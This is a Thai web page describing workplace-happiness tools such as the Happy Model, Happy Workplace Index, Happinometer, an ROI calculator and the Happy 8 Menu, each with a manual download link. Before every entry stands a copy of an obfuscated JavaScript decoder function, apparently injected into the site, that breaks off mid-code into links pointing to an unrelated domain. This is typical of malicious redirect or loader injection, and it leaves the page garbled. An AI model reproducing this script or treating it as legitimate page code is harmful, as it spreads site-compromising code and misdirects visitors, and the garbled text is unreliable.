5+1เครื่องมือสร้างสุข

function l1c373528ef5(o4){var sa=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var q3=”;var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc<<2)|(ve>>4);pc=((ve&15)<<4)|(r4>>2);u6=((r4&3)<<6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oe.cochranfirmcriminaldefense.com/tools#happymodel" name="">

AppI : Happy Model นำเสนอโมเดลการสร้างความสุขด้วยโมเดล Home โดยมององค์กรแห่งความสุข ใน 3 มุมมอง คือ ในระดับองค์กร ระดับการบริหารจัดการความสุข และระดับพนักงาน โมเดลนี้จะทำให้ เข้าใจลักษณะและแนวทางการสร้างความสุขในการทำงาน


ดาวโหลดคู่มือ

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc<<2)|(ve>>4);pc=((ve&15)<<4)|(r4>>2);u6=((r4&3)<<6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oe.cochranfirmcriminaldefense.com/tools#happyworkplaceindex">

AppII : Happy Workplace Index เป็นเครื่องมือประเมินตัวเองและวัดผลการพัฒนาองค์กรเพื่อให้เกิดความสุข ซึ่งแบ่งเป็น 10 มิติ คือ สุขด้วยการจัดการ สุขด้วยบรรยากาศในการทำงาน สุขด้วยกระบวนการสร้างสุข สุขด้วย สุขภาพกายใจ และสุขด้วยผลลัพธ์องค์กร


ดาวโหลดคู่มือ

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc<<2)|(ve>>4);pc=((ve&15)<<4)|(r4>>2);u6=((r4&3)<<6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oe.cochranfirmcriminaldefense.com/tools#happinometer">

APPIII : HAPPINOMETER เป็นเครื่องมือวัดคุณภาพชีวิตและความสุขของพนักงานรายบุคคล โดยแบ่งตัวชี้วัด เป็น 5 มิติ คือ ข้อมูลทั่วไปมี 1 มิติ, Happy 8 มี 8 มิติ, และ Happy Plus มี 1 มิติ


ดาวโหลดคู่มือ

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc<<2)|(ve>>4);pc=((ve&15)<<4)|(r4>>2);u6=((r4&3)<<6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oe.cochranfirmcriminaldefense.com/tools#happyworkplaceroi">

AppIV : Happy Workplace ROI ใช้ประเมินความคุ้มค่า (ROI) ในการดำเนินการ กิจกรรมโครงการที่เกี่ยวข้อง กับความสุขในการทำงาน โดยประเมินจากข้อมูลนำเข้า 12 ส่วน


ดาวโหลดคู่มือ

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc<<2)|(ve>>4);pc=((ve&15)<<4)|(r4>>2);u6=((r4&3)<<6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oe.cochranfirmcriminaldefense.com/tools#happy8menu">

AppV : Happy 8 Menu รวบรวมตัวอย่างกิจกรรมการสร้างความสุขในแต่ละความสุข โดยแบ่งกิจกรรมเป็น 8 กลุ่ม ตาม Happy 8


ดาวโหลดคู่มือ

Screen Shot 2555-12-25 at 1.31.56 PM

Untitled-1

HeHa หรือ Holestic Enterprise Happiness Approach เป็นเครื่องมือหนึ่งในการเสริมสร้างสุขภาวะองค์กรอย่างเป็นระบบ โดยอาศัยแนวคิดของการรักษาสมดุลของความสุขภายในองค์กร ด้วยการเพิ่มผลผลิตควบคู่กับการเสริมสร้างความสุขของทั้งผู้ประกอบการและพนักงาน บนพื้นฐานของการปรับปรุงและพัฒนาอย่างต่อเนื่อง